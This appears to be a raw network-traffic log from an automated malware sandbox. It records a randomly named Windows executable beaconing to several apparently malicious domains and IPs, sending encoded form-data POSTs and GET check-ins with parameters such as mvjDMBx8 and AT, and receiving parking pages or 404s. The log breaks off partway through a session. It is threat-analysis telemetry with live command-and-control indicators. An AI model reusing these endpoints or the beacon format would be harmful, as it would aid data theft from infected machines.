                                        date: Tue, 27 Aug 2024 06:44:25 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1154
                                        x-request-id: 2ba5a5ac-82ae-41f2-996b-b0d8e2107f87
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==
                                        set-cookie: parking_session=2ba5a5ac-82ae-41f2-996b-b0d8e2107f87; expires=Tue, 27 Aug 2024 06:59:26 GMT; path=/
                                        connection: close
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        43 | 192.168.2.6 | 51241 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:28.616971016 CEST | 1898 | OUT | POST /osae/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Origin: http://www.personal-loans-jp8.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.personal-loans-jp8.xyz/osae/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:29.065371037 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        date: Tue, 27 Aug 2024 06:44:28 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1154
                                        x-request-id: 9fa75aa2-caed-41ad-9f0e-d80e6fc5cbea
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==
                                        set-cookie: parking_session=9fa75aa2-caed-41ad-9f0e-d80e6fc5cbea; expires=Tue, 27 Aug 2024 06:59:29 GMT; path=/
                                        connection: close
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                        Aug 27, 2024 08:44:29.065395117 CEST | 607 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWZhNzVhYTItY2FlZC00MWFkLTlmMGUtZDgwZTZmYzVjYmVhIiwicGFnZV90aW1lIjoxNzI0NzQxMD


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        44 | 192.168.2.6 | 51242 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:31.154472113 CEST | 593 | OUT | GET /osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:31.610946894 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        date: Tue, 27 Aug 2024 06:44:31 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1554
                                        x-request-id: 8fc443d4-fedc-456c-9416-342d6aae33de
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t01xJ4nqHadlOKHMXHvVk1n4tsOtinxxFS00Z7pFITK74rxE0XfcLKiSzG7sJ0kHZpvZUFQaxyiNnfNGd15EKg==
                                        set-cookie: parking_session=8fc443d4-fedc-456c-9416-342d6aae33de; expires=Tue, 27 Aug 2024 06:59:31 GMT; path=/
                                        connection: close
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t01xJ4nqHadlOKHMXHvVk1n4tsOtinxxFS00Z7pFITK74rxE0XfcLKiSzG7sJ0kHZpvZUFQaxyiNnfNGd15EKg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                        Aug 27, 2024 08:44:31.611026049 CEST | 1007 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGZjNDQzZDQtZmVkYy00NTZjLTk0MTYtMzQyZDZhYWUzM2RlIiwicGFnZV90aW1lIjoxNzI0NzQxMD


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        45 | 192.168.2.6 | 51243 | 157.7.44.213 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:37.594671965 CEST | 849 | OUT | POST /sryw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Origin: http://www.kamicare-com.tokyo
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.kamicare-com.tokyo/sryw/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=v9he/n5gaxq7RLqVUZkwi1vW5rFJY4AvMktasEpgD0OGLbXnBpiKmFYCJZysxIgjbEnVN/fRl12JM07OyQv70uAGpXLjF1CPZBf52fR9w1z+Foq5H0+OGtXu3jmQ6D6FmybzdivmJD8xGP8pvvc/CiICRSBrP/YhwNRt/34A+yaqV0VP2ZxAyO9Fgc0bp/8qjyiRoWqHXdXk
                                        Aug 27, 2024 08:44:38.435836077 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:38 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        46 | 192.168.2.6 | 51244 | 157.7.44.213 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:40.147605896 CEST | 873 | OUT | POST /sryw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Origin: http://www.kamicare-com.tokyo
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.kamicare-com.tokyo/sryw/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=v9he/n5gaxq7AfWVYeIwzVvXgrFJPoArMkhasFtJDGqGL6nnAoiKhFYCRJy1+ogkbEr3N+jRl1iJMxHOxn7ky+AAwnLhIVCPZBf52fVTw1r+FZa5VRSNZdXtwjmQ+D6BmyaDdgLMJFwxGOMpvec8YyJofyAcJOZYxPI10EUNhQqOQCUVqqxjgedHgesppf8AhyaR6BmgYpyHuiBSkWqCRnjtHhxnD7j19A==
                                        Aug 27, 2024 08:44:40.939760923 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:40 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        47 | 192.168.2.6 | 51245 | 157.7.44.213 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:42.697398901 CEST | 1886 | OUT | POST /sryw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Origin: http://www.kamicare-com.tokyo
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.kamicare-com.tokyo/sryw/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8= [TRUNCATED]
                                        Aug 27, 2024 08:44:43.475512981 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:43 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        48 | 192.168.2.6 | 51246 | 157.7.44.213 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:45.232322931 CEST | 589 | OUT | GET /sryw/?mvjDMBx8=i/J+8XVQTUqjXYi8BOJp91HUxYZ+c6AWCRJ9n1NtfUqKWarFGtf7pFdZZISJr4cvaVfHP+3ktlD0OUvuvz/pl/98wVf2KGrKM2ftp+skyT71Gb7AHg6oN/3q8TTnk2KegzCTKXU=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:46.077529907 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:45 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        49 | 192.168.2.6 | 51247 | 162.240.81.18 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:51.600059032 CEST | 849 | OUT | POST /4jqu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Origin: http://www.sorriragora.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.sorriragora.online/4jqu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=2aQk4gSCf6PDgn5ZezqsuBDTwa9Ta7gk3wTAkE4/4D7kEk/DGhKSbY24+Xj7JeU4w43C2ao1lsGh/x2ftzI7SX2KQEnVyQlrAA4FoUthPijYtfPRV4vu17T22iX2mkaRtXBM04xgGWq16uPA6BUcN18imZ+vTXzh+xeoB9r0+om7t77ixtTMJ+NijPcUJY5uPoXzLhhsJS8N
                                        Aug 27, 2024 08:44:52.158901930 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 27 Aug 2024 06:44:52 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "663a05b6-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Aug 27, 2024 08:44:52.158921003 CEST | 1236 | IN | Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                        Aug 27, 2024 08:44:52.158934116 CEST | 1236 | IN | Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                        Aug 27, 2024 08:44:52.158946037 CEST | 115 | IN | Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        50 | 192.168.2.6 | 51248 | 162.240.81.18 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:54.147631884 CEST | 873 | OUT | POST /4jqu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Origin: http://www.sorriragora.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.sorriragora.online/4jqu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=2aQk4gSCf6PDyUxZSyqsohDQ869TDLgg3wvAkEQV4xfkDGnDUwKSW424mni/UuUJw47K2Y81lsSh/wqftAg4TH2IJ0nX2QlrAA4FoU42PiLYtsnRTZvtrrT1gyX2ikaVtXBi058HGVS16sHA6QUbal9IiZ/cW2idnBjkLfz2/ZbdoN64teTvbutgjNEmJ45ENovzZ2tLGmZuUQhQLnuCHwOWtObZKuLJmQ==
                                        Aug 27, 2024 08:44:54.707762957 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 27 Aug 2024 06:44:54 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "663a05b6-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Aug 27, 2024 08:44:54.707789898 CEST | 1236 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                        Aug 27, 2024 08:44:54.707803011 CEST | 1236 | IN
                                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                        Aug 27, 2024 08:44:54.707962990 CEST | 115 | IN
                                        Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        51 | 192.168.2.6 | 51249 | 162.240.81.18 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:56.692435026 CEST | 1886 | OUT | POST /4jqu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Origin: http://www.sorriragora.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.sorriragora.online/4jqu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:57.244752884 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 27 Aug 2024 06:44:57 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "663a05b6-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Aug 27, 2024 08:44:57.244767904 CEST | 224 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                        Aug 27, 2024 08:44:57.244780064 CEST | 1236 | IN
                                        Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                        Aug 27, 2024 08:44:57.244805098 CEST | 1127 | IN
                                        Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        52 | 192.168.2.6 | 51250 | 162.240.81.18 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:59.234587908 CEST | 589 | OUT | GET /4jqu/?mvjDMBx8=7Y4E7U2NZPWflm9zHmqMqimi+5VuLrMg6kjCj1EInif9PGb3NGzDdsXjsV7gO/0L54/q7blUjcSlxFaP/BkUPUPxQ1br5RU9Wx45qk4zaFXeqdDODb3rhKjRzSvczwWVhnNF6PY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:59.820873976 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 27 Aug 2024 06:44:59 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "663a05b6-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Aug 27, 2024 08:44:59.820893049 CEST | 1236 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                        Aug 27, 2024 08:44:59.820913076 CEST | 1236 | IN
                                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                        Aug 27, 2024 08:44:59.820925951 CEST | 115 | IN
                                        Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        53 | 192.168.2.6 | 51251 | 172.67.220.161 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:45:04.863579988 CEST | 831 | OUT | POST /q1r7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cchelvn.shop
                                        Origin: http://www.cchelvn.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.cchelvn.shop/q1r7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=6Bq+v0eApTmOAyxZ5RJJwTJYx1FedeG7mcnjDny2+e3WpbskASXKhHEbPL+ZpRB/h8PbwOKNsUS9sslb/rJqRBoaHoSBPt84wvHJ+WVmQRhAqzS0AH9rj0aYFmEDKiihqloFFr1ajkWR4oN0B9QokRDiXLnBuNYzEZL5ldwWIRESf3n55HPBq2Hhc4ufGXBDb5RX/pXsfNrM
                                        Aug 27, 2024 08:45:06.261434078 CEST | 1236 | IN | HTTP/1.1 404 Not Found
